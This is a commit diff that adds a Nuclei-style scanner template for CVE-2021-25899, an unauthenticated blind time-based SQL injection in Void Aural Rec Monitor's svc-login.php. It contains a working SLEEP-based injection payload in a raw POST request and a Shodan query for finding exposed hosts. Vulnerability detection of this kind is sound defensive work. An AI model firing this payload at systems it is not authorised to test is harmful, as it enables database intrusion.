commit
12e54d0930
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-25899
|
||||
|
||||
info:
|
||||
name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
An issue was discovered in svc-login.php in Void Aural Rec Monitor 9.0.0.1. An unauthenticated attacker can send a crafted HTTP request to perform a blind time-based SQL Injection. The vulnerable parameter is param1.
|
||||
reference:
|
||||
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/
|
||||
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25899
|
||||
classification:
|
||||
cve-id: CVE-2021-25899
|
||||
metadata:
|
||||
shodan-query: html:"AURALL"
|
||||
tags: cve,cve2021,sqli,void,aurall
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy¶m2=test
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Contacte con el administrador")'
|
||||
condition: and
|
Loading…
Reference in New Issue